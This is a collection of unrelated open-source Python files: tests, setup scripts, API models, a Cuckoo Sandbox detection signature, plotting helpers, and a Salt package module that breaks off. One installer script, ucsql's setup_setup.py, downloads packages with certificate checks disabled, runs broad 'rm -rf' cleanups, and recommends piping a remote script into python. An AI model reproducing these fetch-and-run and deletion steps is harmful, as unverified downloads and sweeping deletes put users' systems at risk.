with self.session.begin(subtransactions=True):
row = self.session.query(CountryBounds).filter_by(name='Afghanistan')
assert row
item = row.first()
assert item.ogc_fid == 1
def get_canada(self):
with self.session.begin(subtransactions=True):
item = self.session.query(CountryBounds).filter_by(name='Canada').first()
assert isinstance(item, CountryBounds)
return item
def test_add_contributor_tile_and_report(self):
with self.session.begin(subtransactions=True):
contributor = Contributor()
contributor.nickname = 'nick'
tile = Tile()
self.session.add(contributor)
self.session.add(tile)
reportweeks.insert_or_update_reportweek(contributor, tile)
def test_add_tile_for_coord(self):
with self.session.begin(subtransactions=True):
tile = Tile()
mercator_coords = Tile.create_tile_ewkt_wgs84(-79.4, 43.7)
tile.geometry = mercator_coords
self.session.add(tile)
CountryBounds.set_country_for_tile(tile)
canada = self.get_canada()
assert tile.country == canada
CountryBounds.set_country_for_tile(tile, use_intersect=True)
assert tile.country == canada
CountryBounds.set_country_for_tile(tile, use_nearby=True)
assert tile.country == canada
def test_coord_conversion(self):
e1 = coord_utils.lon2x_m(-80)
n1 = coord_utils.lat2y_m(44)
e2, n2 = coord_utils.db_get_easting_northing(-80, 44)
assert math.fabs(e1 - e2) < 5
assert math.fabs(n1 - n2) < 5
def test_weekly_rollover(self):
# add data
self.test_add_contributor_tile_and_report()
week_class = reportweeks.get_current_reportweek_class()
session = session_factory()
rows = None
try:
rows = session.query(week_class).one()
except NoResultFound:
pass
assert rows
g = LeaderboardGlobals.get_globals()
g.current_week = reportweeks.current_week_number() - 1
# verify data gets truncated on next access
week_class = reportweeks.get_current_reportweek_class()
session = session_factory()
rows = None
try:
rows = session.query(week_class).one()
except NoResultFound:
pass
assert not rows
| garvankeeley/leaderboard_backend | tests/test_models.py | Python | mpl-2.0 | 3,003 |
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2013, Luis Pedro Coelho <luis@luispedro.org>
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
# License: MIT. See COPYING.MIT file in the Waldo distribution
from __future__ import division
try:
import setuptools
except:
from sys import exit
print('''
setuptools not found. Please install it.
On linux, the package is often called python-setuptools''')
exit(1)
long_description = file('README.rst').read()
classifiers = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering',
'Intended Audience :: Science/Research',
]
install_requires = [
'sqlalchemy',
'lxml',
]
package_dir = {
'waldo.tests': 'waldo/tests',
}
package_data = {
'woof': ['templates/*.html', 'templates/static/*.html', 'media/css/*.css'],
'waldo.tests': ['data/*'],
}
setuptools.setup(name = 'waldo',
version = '0.1',
description = 'Protein Subcellular Location Information Package',
long_description = long_description,
author = 'Luis Pedro Coelho and others (See AUTHORS.txt file)',
author_email = 'luis@luispedro.org',
license = 'MIT',
platforms = ['Any'],
classifiers = classifiers,
url = 'http://murphylab.web.cmu.edu/services/waldo/home',
packages = setuptools.find_packages(),
install_requires = install_requires,
package_dir = package_dir,
package_data = package_data,
scripts = ['bin/update-waldo'],
test_suite = 'nose.collector',
)
| luispedro/waldo | setup.py | Python | mit | 1,654 |
#Quiz Problem 4
def greedySum(L, s):
""" input: s, positive integer, what the sum should add up to
L, list of unique positive integers sorted in descending order
Use the greedy approach where you find the largest multiplier for
the largest value in L then for the second largest, and so on to
solve the equation s = L[0]*m_0 + L[1]*m_1 + ... + L[n-1]*m_(n-1)
return: the sum of the multipliers or "no solution" if greedy approach does
not yield a set of multipliers such that the equation sums to 's'
"""
m_list = [0 for i in range(len(L))]
total_sum = 0
count = 0
for n in L:
m = 0
while True:
current_sum = m * n
if n + current_sum + total_sum <= s:
m += 1
else:
m_list[count] = m
break
count += 1
total_sum += current_sum
if total_sum == s:
return sum(m_list)
else:
return 'no solution' | johntauber/MITx6.00.2x | Quiz/QuizProblem4.py | Python | mit | 1,048 |
# tubex-lib - Examples
# Contractors on tubes: temporal contractors
# Comparison between the Lohner & Picard temporal contractors
# ----------------------------------------------------------------------------
# Auguste Bourgois, 2020
from pyibex import *
from tubex_lib import *
import sys # only for checking if this example still works
# =========== INITIALIZATION ===========
dt = 0.1 # time step of the tubes
tdomain = Interval(0, 5) # time domain of the tubes
x = TubeVector(tdomain, dt, 1) # 1d tube vector
x.set(IntervalVector(1, Interval(0.9, 1.1)), 0.) # initial condition
y = TubeVector(x) # copy of x
beginDrawing()
# =========== COMPARISON OF CONTRACTORS ===========
f = Function("x", "-sin(x)") # xdot = -sin(x)
# Picard contractor
ctc_picard = CtcPicard(f)
ctc_picard.contract(x)
fig1 = VIBesFigTube("Picard integration")
fig1.set_properties(100, 100, 800, 400)
fig1.add_tube(x[0], "x")
# Lohner contractor
ctc_lohner = CtcLohner(f)
ctc_lohner.contract(y)
fig2 = VIBesFigTube("Lohner integration")
fig2.set_properties(100, 550, 800, 400)
fig2.add_tube(y[0], "y")
# =========== COMPUTING TRAJECTORIES AS ILLUSTRATION ===========
v_traj = [Trajectory for _ in range(11)]
for i in range(0,len(v_traj)):
x0 = 0.9 + 0.199 * (i / 10.) # initial conditions in [x0]=[0.9,1.1]
v_traj[i] = Trajectory(tdomain, TFunction(str(x0) + "*2.*atan(exp(-t)*tan(0.5))"))
fig1.add_trajectory(v_traj[i], "truth" + str(i))
fig2.add_trajectory(v_traj[i], "truth" + str(i))
fig1.show(True)
fig2.show(True)
fig1.axis_limits(fig2.view_box())
endDrawing()
# =========== ENDING ===========
# Checking if this example still works:
for traj_i in v_traj:
if x[0].contains(traj_i) != BoolInterval.YES:
sys.exit(0)
if y[0].contains(traj_i) != BoolInterval.YES:
sys.exit(0)
# Checking if this example still works:
sys.exit(0 if fabs(x[0].volume() - 13.9148) < 1e-2 and fabs(y[0].volume() - 0.43186) < 1e-2 else 1) | SimonRohou/tubex-lib | examples/basics/07_temporal_ctc/07_temporal_ctc.py | Python | lgpl-3.0 | 1,939 |
from pprint import pformat
class Model(object):
"""
Implements a generic object.
"""
def __init__(self, data, api):
self.temp_id = ''
self.data = data
self.api = api
def __setitem__(self, key, value):
self.data[key] = value
def __getitem__(self, key):
return self.data[key]
def __repr__(self):
formatted_dict = pformat(dict(self.data))
classname = self.__class__.__name__
return '%s(%s)' % (classname, formatted_dict)
class Filter(Model):
"""
Implements a filter.
"""
def update(self, **kwargs):
"""
Updates filter, and appends the equivalent request to the queue.
"""
self.api.filters.update(self['id'], **kwargs)
self.data.update(kwargs)
def delete(self):
"""
Deletes filter, and appends the equivalent request to the queue.
"""
self.api.filters.delete(self['id'])
self.data['is_deleted'] = 1
class Item(Model):
"""
Implements an item.
"""
def update(self, **kwargs):
"""
Updates item, and appends the equivalent request to the queue.
"""
self.api.items.update(self['id'], **kwargs)
self.data.update(kwargs)
def delete(self):
"""
Deletes item, and appends the equivalent request to the queue.
"""
self.api.items.delete([self['id']])
self.data['is_deleted'] = 1
def move(self, to_project):
"""
Moves item to another project, and appends the equivalent request to
the queue.
"""
self.api.items.move({self['project_id']: [self['id']]}, to_project)
self.data['project_id'] = to_project
def close(self):
"""
Marks item as closed
"""
self.api.items.close(self['id'])
def complete(self, force_history=0):
"""
Marks item as completed, and appends the equivalent request to the
queue.
"""
self.api.items.complete([self['id']], force_history)
self.data['checked'] = 1
self.data['in_history'] = force_history
def uncomplete(self, update_item_orders=1, restore_state=None):
"""
Marks item as not completed, and appends the equivalent request to the
queue.
"""
self.api.items.uncomplete([self['id']], update_item_orders,
restore_state)
self.data['checked'] = 0
self.data['in_history'] = 0
if restore_state and self['id'] in restore_state:
self.data['in_history'] = restore_state[self['id']][0]
self.data['checked'] = restore_state[self['id']][1]
self.data['item_order'] = restore_state[self['id']][2]
self.data['indent'] = restore_state[self['id']][3]
def update_date_complete(self, new_date_utc=None, date_string=None,
is_forward=None):
"""
Completes a recurring task, and appends the equivalent request to the
queue.
"""
self.api.items.update_date_complete(self['id'], new_date_utc,
date_string, is_forward)
if new_date_utc:
self.data['due_date_utc'] = new_date_utc
if date_string:
self.data['date_string'] = date_string
class Label(Model):
"""
Implements a label.
"""
def update(self, **kwargs):
"""
Updates label, and appends the equivalent request to the queue.
"""
self.api.labels.update(self['id'], **kwargs)
self.data.update(kwargs)
def delete(self):
"""
Deletes label, and appends the equivalent request to the queue.
"""
self.api.labels.delete(self['id'])
self.data['is_deleted'] = 1
class LiveNotification(Model):
"""
Implements a live notification.
"""
pass
class GenericNote(Model):
"""
Implements a note.
"""
#: has to be defined in subclasses
local_manager = None
def update(self, **kwargs):
"""
Updates note, and appends the equivalent request to the queue.
"""
self.local_manager.update(self['id'], **kwargs)
self.data.update(kwargs)
def delete(self):
"""
Deletes note, and appends the equivalent request to the queue.
"""
self.local_manager.delete(self['id'])
self.data['is_deleted'] = 1
class Note(GenericNote):
"""
Implement an item note.
"""
def __init__(self, data, api):
GenericNote.__init__(self, data, api)
self.local_manager = self.api.notes
class ProjectNote(GenericNote):
"""
Implement a project note.
"""
def __init__(self, data, api):
GenericNote.__init__(self, data, api)
self.local_manager = self.api.project_notes
class Project(Model):
"""
Implements a project.
"""
def update(self, **kwargs):
"""
Updates project, and appends the equivalent request to the queue.
"""
self.api.projects.update(self['id'], **kwargs)
self.data.update(kwargs)
def delete(self):
"""
Deletes project, and appends the equivalent request to the queue.
"""
self.api.projects.delete([self['id']])
self.data['is_deleted'] = 1
def archive(self):
"""
Marks project as archived, and appends the equivalent request to the
queue.
"""
self.api.projects.archive(self['id'])
self.data['is_archived'] = 1
def unarchive(self):
"""
Marks project as not archived, and appends the equivalent request to
the queue.
"""
self.api.projects.unarchive(self['id'])
self.data['is_archived'] = 0
class Reminder(Model):
"""
Implements a reminder.
"""
def update(self, **kwargs):
"""
Updates reminder, and appends the equivalent request to the queue.
"""
self.api.reminders.update(self['id'], **kwargs)
self.data.update(kwargs)
def delete(self):
"""
Deletes reminder, and appends the equivalent request to the queue.
"""
self.api.reminders.delete(self['id'])
self.data['is_deleted'] = 1
| ajar98/todoist_bot | todoist/models.py | Python | mit | 6,334 |
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Accuvant, Inc. (bspengler@accuvant.com)
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
from lib.cuckoo.common.abstracts import Signature
class InjectionExtension(Signature):
name = "injection_needextension"
description = "尝试执行自身的拷贝,但需要.exe后缀才能工作"
severity = 3
categories = ["injection"]
authors = ["Accuvant"]
minimum = "1.0"
evented = True
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
filter_apinames = set(["CreateProcessInternalW"])
def on_call(self, call, process):
if call["status"] == False:
procname = process["process_name"].lower()
if procname.endswith(".exe") == False:
procname += ".exe"
apiarg1 = self.get_argument(call, "ApplicationName")
apiarg2 = self.get_argument(call, "CommandLine")
if apiarg1.endswith(procname) or apiarg2.endswith(procname):
return True
| lixiangning888/whole_project | modules/signatures_merge_tmp/injection_needextension.py | Python | lgpl-3.0 | 1,136 |
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django import forms
class UserRegistrationForm(UserCreationForm):
class Meta:
model = User
fields = ('username', 'email',)
| cscanlin/munger-builder | munger_builder/forms.py | Python | mit | 269 |
# (C) British Crown Copyright 2017, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""Test function :func:`iris._lazy data.as_concrete_data`."""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
import numpy as np
import numpy.ma as ma
from iris._lazy_data import as_concrete_data, as_lazy_data, is_lazy_data
from iris.tests import mock
class MyProxy(object):
def __init__(self, a):
self.shape = a.shape
self.dtype = a.dtype
self.a = a
def __getitem__(self, keys):
return self.a[keys]
class Test_as_concrete_data(tests.IrisTest):
def test_concrete_input_data(self):
data = np.arange(24).reshape((4, 6))
result = as_concrete_data(data)
self.assertIs(data, result)
self.assertFalse(is_lazy_data(result))
def test_concrete_masked_input_data(self):
data = ma.masked_array([10, 12, 8, 2], mask=[True, True, False, True])
result = as_concrete_data(data)
self.assertIs(data, result)
self.assertFalse(is_lazy_data(result))
def test_lazy_data(self):
data = np.arange(24).reshape((2, 12))
lazy_array = as_lazy_data(data)
self.assertTrue(is_lazy_data(lazy_array))
result = as_concrete_data(lazy_array)
self.assertFalse(is_lazy_data(result))
self.assertArrayEqual(result, data)
def test_lazy_mask_data(self):
data = np.arange(24).reshape((2, 12))
fill_value = 1234
mask_data = ma.masked_array(data, fill_value=fill_value)
lazy_array = as_lazy_data(mask_data)
self.assertTrue(is_lazy_data(lazy_array))
result = as_concrete_data(lazy_array)
self.assertFalse(is_lazy_data(result))
self.assertMaskedArrayEqual(result, mask_data)
self.assertEqual(result.fill_value, fill_value)
def test_lazy_scalar_proxy(self):
a = np.array(5)
proxy = MyProxy(a)
lazy_array = as_lazy_data(proxy)
self.assertTrue(is_lazy_data(lazy_array))
result = as_concrete_data(lazy_array)
self.assertFalse(is_lazy_data(result))
self.assertEqual(result, a)
def test_lazy_scalar_proxy_masked(self):
a = np.ma.masked_array(5, True)
proxy = MyProxy(a)
lazy_array = as_lazy_data(proxy)
self.assertTrue(is_lazy_data(lazy_array))
result = as_concrete_data(lazy_array)
self.assertFalse(is_lazy_data(result))
self.assertMaskedArrayEqual(result, a)
if __name__ == '__main__':
tests.main()
| LukeC92/iris | lib/iris/tests/unit/lazy_data/test_as_concrete_data.py | Python | lgpl-3.0 | 3,347 |
# -*- coding: utf-8 -*-
import json
from unittest.mock import patch, Mock
from unittest import TestCase
from swiftclient import client
from storage.tests import fakes
from storage import views
from vault.tests.fakes import fake_request
class TestSwiftTrash(TestCase):
def setUp(self):
self.request = fake_request()
# silence log
patch('storage.views.log',
Mock(return_value=None)).start()
patch('identity.keystone.Keystone',
Mock(return_value=None)).start()
def tearDown(self):
patch.stopall()
def test_deleted_objects_list_needs_authentication(self):
req = fake_request(user=False)
response = views.get_deleted_objects(req)
self.assertEqual(response.status_code, 302)
@patch("storage.views.client.get_container")
def test_get_deleted_objects_returns_a_json(self, mock_get_container):
mock_get_container.return_value = fakes.get_container()
project_name = self.request.session.get('project_name')
response = views.get_deleted_objects(self.request, project_name, 'container1')
self.assertIn(b'application/json', response.serialize_headers())
@patch("storage.views.client.get_container")
def test_check_properties_from_get_deleted_objects_content(self, mock_get_container):
mock_get_container.return_value = fakes.get_container(trash_container=".trash-container1")
project_name = self.request.session.get('project_name')
response = views.get_deleted_objects(self.request, project_name, 'container1')
expected_items = ["deleted_objects", "prefix", "storage_url",
"trash_container", "original_container"]
result = json.loads(response.content)
for item in expected_items:
self.assertIn(item, result)
@patch("storage.views.client.get_container")
def test_get_deleted_objects_client_exception(self, mock_get_container):
mock_get_container.side_effect = client.ClientException("error message",
http_status=500)
project_name = self.request.session.get('project_name')
response = views.get_deleted_objects(self.request, project_name, 'container1')
self.assertEqual(response.content.decode(), '{"error": "error message"}')
self.assertEqual(response.status_code, 500)
@patch("storage.views.remove_from_trash")
def test_deleted_objects_from_trash(self, mock_trash_remove):
mock_trash_remove.return_value = fakes.FakeRequestResponse(200)
response = views.remove_from_trash(self.request)
self.assertEqual(response.status_code, 200)
@patch("storage.views.remove_from_trash")
def test_deleted_objects_from_trash_with_fail(self, mock_trash_remove):
mock_trash_remove.return_value = fakes.FakeRequestResponse(500)
response = views.remove_from_trash(self.request)
self.assertEqual(response.status_code, 500)
@patch("storage.views.delete_pseudofolder")
def test_deleted_objects_from_pseudofolder(self, mock_remove_from_pseudo_folder):
mock_remove_from_pseudo_folder.return_value = fakes.FakeRequestResponse(200)
response = views.delete_pseudofolder(self.request, "container1", "pseudofolder")
self.assertEqual(response.status_code, 200)
@patch("storage.views.delete_pseudofolder")
def test_deleted_objects_from_pseudofolder_with_fail(self, mock_remove_from_pseudo_folder):
mock_remove_from_pseudo_folder.return_value = fakes.FakeRequestResponse(500)
response = views.delete_pseudofolder(self.request, "container1", "pseudofolder")
self.assertEqual(response.status_code, 500)
@patch("storage.views.restore_object")
def test_restore_object_from_trash(self, mock_restore):
mock_restore.return_value = fakes.FakeRequestResponse(202)
response = views.restore_object(self.request)
self.assertEqual(response.status_code, 202)
@patch("storage.views.restore_object")
def test_restore_object_from_trash_with_fail_error_on_put_object(self, mock_restore):
mock_restore.return_value = fakes.FakeRequestResponse(500)
response = views.restore_object(self.request)
self.assertEqual(response.status_code, 500)
@patch("storage.views.restore_object")
def test_restore_object_from_trash_with_fail_object_exists_on_container(self, mock_restore):
mock_restore.return_value = fakes.FakeRequestResponse(409)
response = views.restore_object(self.request)
self.assertEqual(response.status_code, 409)
| globocom/vault | storage/tests/test_swift_trash.py | Python | apache-2.0 | 4,672 |
# -*- coding: utf-8 -*-
# pylint: disable=protected-access
"""Test for Video Xmodule functional logic.
These test data read from xml, not from mongo.
We have a ModuleStoreTestCase class defined in
common/lib/xmodule/xmodule/modulestore/tests/django_utils.py.
You can search for usages of this in the cms and lms tests for examples.
You use this so that it will do things like point the modulestore
setting to mongo, flush the contentstore before and after, load the
templates, etc.
You can then use the CourseFactory and XModuleItemFactory as defined in
common/lib/xmodule/xmodule/modulestore/tests/factories.py to create the
course, section, subsection, unit, etc.
"""
from nose.plugins.attrib import attr
from xmodule.tests import LogicTest
from xmodule.video_module import VideoDescriptor
SOURCE_XML = """
<video show_captions="true"
display_name="A Name"
youtube="0.75:jNCf2gIqpeE,1.0:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg"
sub="a_sub_file.srt.sjson"
download_video="true"
start_time="01:00:03" end_time="01:00:10"
>
<source src="example.mp4"/>
<source src="example.webm"/>
<transcript language="uk" src="ukrainian_translation.srt" />
</video>
"""
@attr(shard=1)
class VideoModuleLogicTest(LogicTest):
"""Tests for logic of Video Xmodule."""
descriptor_class = VideoDescriptor
raw_field_data = {
'data': '<video />'
}
def test_parse_youtube(self):
"""Test parsing old-style Youtube ID strings into a dict."""
youtube_str = '0.75:jNCf2gIqpeE,1.00:ZwkTiUPN0mg,1.25:rsq9auxASqI,1.50:kMyNdzVHHgg'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': 'ZwkTiUPN0mg',
'1.25': 'rsq9auxASqI',
'1.50': 'kMyNdzVHHgg'})
def test_parse_youtube_one_video(self):
"""
Ensure that all keys are present and missing speeds map to the
empty string.
"""
youtube_str = '0.75:jNCf2gIqpeE'
output = VideoDescriptor._parse_youtube(youtube_str)
self.assertEqual(output, {'0.75': 'jNCf2gIqpeE',
'1.00': '',
'1.25': '',
'1.50': ''})
def test_parse_youtube_key_format(self):
"""
Make sure that inconsistent speed keys are parsed correctly.
"""
youtube_str = '1.00:p2Q6BrNhdh8'
youtube_str_hack = '1.0:p2Q6BrNhdh8'
self.assertEqual(
VideoDescriptor._parse_youtube(youtube_str),
VideoDescriptor._parse_youtube(youtube_str_hack)
)
def test_parse_youtube_empty(self):
"""
Some courses have empty youtube attributes, so we should handle
that well.
"""
self.assertEqual(VideoDescriptor._parse_youtube(''),
{'0.75': '',
'1.00': '',
'1.25': '',
'1.50': ''})
| Stanford-Online/edx-platform | lms/djangoapps/courseware/tests/test_video_xml.py | Python | agpl-3.0 | 3,114 |
#!/usr/bin/python
#
# Run multiple LDViews in parallel to make pictures faster. On my computer I can
# get about a 2x speed-up with this.
#
# Hazen 11/15
#
import os
import Queue
import signal
import subprocess
import sys
import thread
def batchLDView(file_pairs, width = 200, height = 200, default_zoom = 0.95, max_processes = 6, rerender = True):
"""
file_pairs is an array of [[input_file1, output_file1], [input_file2, output_file2], ..]
"""
# Setup process queue.
process_count = 0
results = Queue.Queue()
# Start processes.
n_files = len(file_pairs)
procs = []
for i, file_pair in enumerate(file_pairs):
# Don't redraw the picture if we already have a picture.
if os.path.exists(file_pair[1]) and not rerender:
continue
try:
# Wait for a process to stop before starting
# the next one if we are at the limit.
if(process_count >= max_processes):
description, rc = results.get()
print description
process_count -= 1
proc = subprocess.Popen(['LDView',
file_pair[0],
"-SaveSnapshot=" + file_pair[1],
"-SaveActualSize=0",
"-SaveWidth=" + str(width),
"-SaveHeight=" + str(height),
"-DefaultZoom=" + str(default_zoom)])
procs.append(proc)
thread.start_new_thread(process_waiter,
(proc,
"Rendered (" + str(i) + " / " + str(n_files) + ") " + file_pair[0],
results))
process_count += 1
except KeyboardInterrupt:
for proc in procs:
if(not proc.poll()):
proc.send_signal(signal.CTRL_C_EVENT)
# Wait until all the processes finish.
try:
while(process_count>0):
description, rc = results.get()
print description
process_count -= 1
except KeyboardInterrupt:
for proc in procs:
if(not proc.poll()):
proc.send_signal(signal.CTRL_C_EVENT)
def process_waiter(popen, description, que):
try:
popen.wait()
finally:
que.put((description, popen.returncode))
#
# If you run this in standalone mode it will generate pictures
# of all your parts in the current directory.
#
if (__name__ == '__main__'):
import opensdraw.lcad_lib.ldrawPath as ldrawPath
# Create list of parts.
print "Creating part list."
ldraw_path = ldrawPath.getLDrawPath()
all_parts = []
with open(ldraw_path + "parts.lst") as part_list:
for part in part_list:
text = ' '.join(part.split())
file_name = text.split()[0]
picture_name = file_name[:-4] + "_71.png"
file_name = ldraw_path + "parts" + os.path.sep + file_name
all_parts.append([file_name, picture_name])
#if (len(all_parts) > 100):
# break
# Render.
print "Rendering."
batchLDView(all_parts, rerender = False)
#
# The MIT License
#
# Copyright (c) 2015 Hazen Babcock
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
| HazenBabcock/opensdraw | opensdraw/partviewer/batchPictureGeneration.py | Python | mit | 4,421 |
# Core
from app.api import api
from flask import jsonify
from flask.ext.cors import cross_origin
# Models
from app.models.location import Location
@cross_origin()
@api.route('/locations', methods=['GET'])
def get_locations():
"""
:return: Return a list with all locations
"""
# Get all movies from DB
locations = Location.query.all()
result = []
for location in locations:
result.append(location.get_information())
return jsonify(locations=result)
| boltzj/movies-in-sf | app/api/locations.py | Python | mit | 492 |
#!/usr/bin/env python
#
# setup_setup.py for 'ucsql'
#
# This is the 'easy button' for installation of 'ucsql'
# Given the many dependencies, this script will optionally go an install everything it needs.
# If admins wish to install packages manually, then they can skip this.
# This script is assumed to be run from 'setup.py', but can be run standalone.
# Any missing pre-requisites will be flagged during the normal 'setup.py'
#
import sys
import os
import glob
#
# Make sure we have what we might need
#
# Many packages don't install properly with 'pip', so install them here via 'yum' or 'zypper'
#
# 'linuxprereqs' includes the dependency, and the determinator. Assumes local package installe (yum, zypper, ...)
#
# 'lxml' has too many dependencies to install manually as a pythonprereq. Install via yum/zypper
#
linuxprereqs = { "wget" : "which wget >/dev/null 2>&1",
"gcc" : "which gcc >/dev/null 2>&1",
"python-devel" : "rpm -qa | grep python-dev 2>&1",
"python-lxml" : "rpm -qa | grep lxml 2>&1"
}
#
# 'pythonpreqs' include the module needed and the source URL if it needs to be installed
#
# 'setuptools', 'pip', etc are not 100% consistent/reliable, so we'll do it by hand
#
pythonprereqs = {
# 'lxml' : { 'namevers' : 'lxml-3.2.3', 'wget' : 'https://pypi.python.org/packages/source/l/lxml/lxml-3.2.3.tar.gz#md5=fef47bb4ac72ac38ce778518dac42236' } ,
'setuptools' : { 'namevers' : 'setuptools-1.4.1', 'wget': 'https://pypi.python.org/packages/source/s/setuptools/setuptools-1.4.1.tar.gz#md5=65bb270fbae373c26a2fa890ad907818'} ,
'Crypto' : { 'namevers' : 'pycrypto-2.6.1', 'wget': 'https://ftp.dlitz.net/pub/dlitz/crypto/pycrypto/pycrypto-2.6.1.tar.gz'},
'pyparsing' : { 'namevers' : 'pyparsing-2.0.1', 'wget' : 'http://cheeseshop.python.org/packages/source/p/pyparsing/pyparsing-2.0.1.tar.gz' }
}
def install_this(mod):
cmd = "wget --no-check-certificate " + pythonprereqs[mod]['wget']
print cmd
os.system (cmd)
cmd = "tar xzvf " + pythonprereqs[mod]['namevers'] + ".tar.gz"
print cmd
os.system (cmd)
os.chdir (pythonprereqs[mod]['namevers'])
os.system ("python setup.py install")
os.chdir ("..")
def main():
# linux = os.popen("egrep 'Linux|CentOS' /etc/issue").readline()
# if ('Red Hat' in linux or 'CentOS' in linux):
# cmd = "yum install -y "
# elif ('SUSE' in linux):
# cmd = "zypper install -y "
# else:
# print "Sorry, but your Linux distro %s is not yet supported" % linux
# return -1
cmd = "yum install -y "
#
# Cleanup boogers and eggs from previous installs
#
boogers = ['/usr/lib64/python2.*/site-packages/ucsql*',
'/usr/local/lib/python2.*/site-packages/ucsql*',
'/usr/local/lib/python2.*/dist-packages/ucsql*',
'/usr/lib/python2.*/site-packages/ucsql*' ]
for b in boogers:
for e in glob.glob(b):
cmd = "rm -rf %s" % (e)
print "Cleaning up from previous (bad) installation : ", cmd
os.system (cmd)
for i in linuxprereqs:
dep = os.system (linuxprereqs[i])
if dep != 0:
tcmd = cmd + i
print
print "About to run '%s'" % tcmd
try:
raw_input( "Okay? [ or hit ^C ]")
except:
print
print "Exiting ..."
return -1
print tcmd
os.system (tcmd)
else:
print i, " is currently installed"
for i in pythonprereqs:
pcmd = "python -c \"import %s\" > /dev/null 2>&1" % i
if os.system (pcmd) != 0:
print
print i + " : Not found. Installing from : " + pythonprereqs[i]['wget']
print
install_this (i)
try:
import pkg_resources
except ImportError:
print "Missing 'pkg_resources'. Please run 'curl https://bitbucket.org/pypa/setuptools/raw/bootstrap/ez_setup.py | python'"
print "... and then rerun this install script"
return -1
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
#
# Make sure 'generateDS' is installed. Need to download/install directly, if needed.
#
generateDS = os.popen ("which generateDS.py 2>/dev/null").read().strip()
if generateDS == "":
# Go install it.
os.system ("wget --no-check-certificate https://pypi.python.org/packages/source/g/generateDS/generateDS-2.12a.tar.gz#md5=69e60733668c95ae26f9f6da0576cbfc; tar xzvf generateDS-2.12a.tar.gz; cd generateDS-2.12a; python setup.py install; cd ..")
#
# Remove XML boogers, if any. These represent conflicts with generateDS/lxml
#
boogers = ['/usr/lib64/python2.*/site-packages/_xmlplus',
'/usr/local/lib/python2.*/site-packages/_xmlplus',
'/usr/local/lib/python2.*/dist-packages/_xmlplus',
'/usr/lib/python2.*/site-packages/_xmlplus' ]
for b in boogers:
if glob.glob(b):
print "The '_xmlplus' directory has been detected in : ", glob.glob(b)
print "This will unfortunately conflict with the 'lxml' package libraries"
print "If you can, please delete the %s directory, and then rerun this setup script" % glob.glob(b)
return -1
return 0
if __name__ == "__main__":
sys.exit(main())
| ucsql/ucsql | setup_setup.py | Python | apache-2.0 | 5,477 |
import matplotlib
import matplotlib.pyplot as plt
from functools import wraps
def ensure_ax(func):
@wraps(func)
def inner(*args, **kwargs):
if 'ax' in kwargs:
ax = kwargs.pop('ax', None)
elif len(args) > 0 and isinstance(args[0], matplotlib.axes.Axes):
ax = args[0]
args = args[1:]
else:
ax = plt.gca()
return func(ax, *args, **kwargs)
return inner
def ensure_ax_meth(func):
@wraps(func)
def inner(*args, **kwargs):
s = args[0]
args = args[1:]
if 'ax' in kwargs:
ax = kwargs.pop('ax', None)
elif len(args) > 1 and isinstance(args[0], matplotlib.axes.Axes):
ax = args[0]
args = args[1:]
else:
ax = plt.gca()
return func(s, ax, *args, **kwargs)
return inner
| ericdill/xray-vision | xray_vision/utils/mpl_helpers.py | Python | bsd-3-clause | 861 |
"""
Support for Portage
.. important::
If you feel that Salt should be using this module to manage packages on a
minion, and it is using a different module (or gives an error similar to
*'pkg.install' is not available*), see :ref:`here
<module-provider-override>`.
:optdepends: - portage Python adapter
For now all package names *MUST* include the package category,
i.e. ``'vim'`` will not work, ``'app-editors/vim'`` will.
"""
import copy
import datetime
import logging
import os
import re
import salt.utils.args
import salt.utils.compat
import salt.utils.data
import salt.utils.functools
import salt.utils.path
import salt.utils.pkg
import salt.utils.systemd
import salt.utils.versions
from salt.exceptions import CommandExecutionError, MinionError
HAS_PORTAGE = False
try:
import portage
HAS_PORTAGE = True
except ImportError:
import os
import sys
if os.path.isdir("/usr/lib/portage/pym"):
try:
# In a virtualenv, the portage python path needs to be manually added
sys.path.insert(0, "/usr/lib/portage/pym")
import portage
HAS_PORTAGE = True
except ImportError:
pass
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = "pkg"
def __virtual__():
"""
Confirm this module is on a Gentoo based system
"""
if HAS_PORTAGE and __grains__["os"] == "Gentoo":
